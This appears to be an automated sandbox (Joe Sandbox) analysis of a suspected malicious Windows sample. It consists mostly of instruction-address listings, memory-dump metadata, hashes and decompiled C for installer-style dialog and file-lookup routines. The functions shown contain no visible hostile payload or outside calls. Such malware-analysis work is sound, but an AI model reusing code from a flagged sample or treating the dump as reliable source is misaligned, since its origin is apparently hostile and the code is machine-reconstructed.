                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                              • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                              • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                              • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                                                              0x004069a9
                                                                                              0x004069b2
                                                                                              0x00000000
                                                                                              0x004069bf
                                                                                              0x004069b5
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(7476FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004069A9
                                                                                              • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                              • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                              • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                                                              C-Code - Quality: 84%
                                                                                              			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                                                              0x004040d0
                                                                                              0x004040d7
                                                                                              0x0040423e
                                                                                              0x00404242
                                                                                              0x00404246
                                                                                              0x00404248
                                                                                              0x0040424d
                                                                                              0x00404258
                                                                                              0x00404263
                                                                                              0x00404268
                                                                                              0x0040426a
                                                                                              0x0040426c
                                                                                              0x0040426f
                                                                                              0x00404274
                                                                                              0x00404282
                                                                                              0x0040428f
                                                                                              0x00404296
                                                                                              0x00404296
                                                                                              0x00404297
                                                                                              0x00404297
                                                                                              0x0040429c
                                                                                              0x004042a2
                                                                                              0x004042a9
                                                                                              0x004042af
                                                                                              0x004042b1
                                                                                              0x004042f1
                                                                                              0x004042f6
                                                                                              0x004042fb
                                                                                              0x004042fb
                                                                                              0x00404300
                                                                                              0x00404309
                                                                                              0x0040430b
                                                                                              0x00404310
                                                                                              0x00404316
                                                                                              0x0040431a
                                                                                              0x0040431a
                                                                                              0x0040431f
                                                                                              0x00404325
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404330
                                                                                              0x00404336
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040433f
                                                                                              0x00404347
                                                                                              0x0040434c
                                                                                              0x0040434f
                                                                                              0x00404355
                                                                                              0x0040435a
                                                                                              0x0040435d
                                                                                              0x00404363
                                                                                              0x00404368
                                                                                              0x0040436b
                                                                                              0x00404371
                                                                                              0x00404379
                                                                                              0x0040437f
                                                                                              0x00404385
                                                                                              0x00404389
                                                                                              0x00404390
                                                                                              0x00404390
                                                                                              0x00404390
                                                                                              0x0040439a
                                                                                              0x004043ac
                                                                                              0x004043b8
                                                                                              0x004043bd
                                                                                              0x004043c7
                                                                                              0x004043cd
                                                                                              0x004043cf
                                                                                              0x004043d4
                                                                                              0x004043d1
                                                                                              0x004043d1
                                                                                              0x004043d1
                                                                                              0x004043e4
                                                                                              0x004043fc
                                                                                              0x004043fe
                                                                                              0x00404404
                                                                                              0x00404419
                                                                                              0x00404406
                                                                                              0x0040440f
                                                                                              0x00404411
                                                                                              0x00404411
                                                                                              0x0040441f
                                                                                              0x00404430
                                                                                              0x00404446
                                                                                              0x0040444d
                                                                                              0x00404453
                                                                                              0x00404457
                                                                                              0x0040445c
                                                                                              0x0040445e
                                                                                              0x00000000
                                                                                              0x00404464
                                                                                              0x00404464
                                                                                              0x00404466
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040446c
                                                                                              0x00404470
                                                                                              0x00404495
                                                                                              0x0040449b
                                                                                              0x004044a1
                                                                                              0x004044a3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004044c9
                                                                                              0x004044cf
                                                                                              0x004044d1
                                                                                              0x004044d6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004044dc
                                                                                              0x004044df
                                                                                              0x004044e2
                                                                                              0x004044f9
                                                                                              0x00404505
                                                                                              0x0040451e
                                                                                              0x00404524
                                                                                              0x00404528
                                                                                              0x0040452d
                                                                                              0x00404533
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040453d
                                                                                              0x00404548
                                                                                              0x00000000
                                                                                              0x00404548
                                                                                              0x00404472
                                                                                              0x00404478
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040447e
                                                                                              0x00404484
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040448a
                                                                                              0x0040445e
                                                                                              0x00404555
                                                                                              0x00404561
                                                                                              0x00404568
                                                                                              0x00000000
                                                                                              0x004042b3
                                                                                              0x004042b3
                                                                                              0x004042b6
                                                                                              0x004042e9
                                                                                              0x004042e9
                                                                                              0x004042eb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042eb
                                                                                              0x004042b8
                                                                                              0x004042bc
                                                                                              0x004042c1
                                                                                              0x004042c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042d3
                                                                                              0x004042db
                                                                                              0x00000000
                                                                                              0x004042e1
                                                                                              0x004040e9
                                                                                              0x004040e9
                                                                                              0x004040ed
                                                                                              0x004040f2
                                                                                              0x00404101
                                                                                              0x00404101
                                                                                              0x00404107
                                                                                              0x0040410e
                                                                                              0x00404152
                                                                                              0x00404158
                                                                                              0x00404171
                                                                                              0x00404174
                                                                                              0x00404187
                                                                                              0x0040418d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404193
                                                                                              0x0040419e
                                                                                              0x004041a0
                                                                                              0x004041a2
                                                                                              0x004041c1
                                                                                              0x004041c1
                                                                                              0x004041c4
                                                                                              0x004041c9
                                                                                              0x004041cc
                                                                                              0x004041dc
                                                                                              0x004041dd
                                                                                              0x004041df
                                                                                              0x00404215
                                                                                              0x00404225
                                                                                              0x00000000
                                                                                              0x00404225
                                                                                              0x004041e1
                                                                                              0x004041e7
                                                                                              0x00404200
                                                                                              0x00404205
                                                                                              0x00404207
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404209
                                                                                              0x004041f5
                                                                                              0x004041f5
                                                                                              0x004041f7
                                                                                              0x004041f7
                                                                                              0x00000000
                                                                                              0x004041f7
                                                                                              0x004041ea
                                                                                              0x004041ef
                                                                                              0x00000000
                                                                                              0x004041ef
                                                                                              0x004041ce
                                                                                              0x004041d4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004041d6
                                                                                              0x00000000
                                                                                              0x004041d6
                                                                                              0x004041c6
                                                                                              0x00000000
                                                                                              0x004041c6
                                                                                              0x004041ac
                                                                                              0x004041b3
                                                                                              0x004041b9
                                                                                              0x004041bb
                                                                                              0x00404591
                                                                                              0x00000000
                                                                                              0x00404591
                                                                                              0x00000000
                                                                                              0x004041bb
                                                                                              0x00404179
                                                                                              0x00000000
                                                                                              0x00404181
                                                                                              0x00404160
                                                                                              0x00404166
                                                                                              0x0040456e
                                                                                              0x0040456e
                                                                                              0x00404574
                                                                                              0x00404581
                                                                                              0x00404587
                                                                                              0x00404587
                                                                                              0x00000000
                                                                                              0x00404110
                                                                                              0x00404115
                                                                                              0x00404121
                                                                                              0x0040412a
                                                                                              0x0040422b
                                                                                              0x00000000
                                                                                              0x00404149
                                                                                              0x0040414c
                                                                                              0x00000000
                                                                                              0x0040414c
                                                                                              0x0040412a
                                                                                              0x0040410e

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                              • ShowWindow.USER32(?), ref: 00404121
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                              • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                              • DestroyWindow.USER32 ref: 00404160
                                                                                              • SetWindowLongW.USER32 ref: 00404179
                                                                                              • GetDlgItem.USER32 ref: 00404198
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                              • GetDlgItem.USER32 ref: 0040425E
                                                                                              • GetDlgItem.USER32 ref: 00404268
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                              • GetDlgItem.USER32 ref: 00404379
                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                              • EnableWindow.USER32(?,?), ref: 004043AC
                                                                                              • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                              • EnableMenuItem.USER32 ref: 004043E4
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                              • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID: H7B
                                                                                              • API String ID: 2475350683-2300413410
                                                                                              • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                              • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
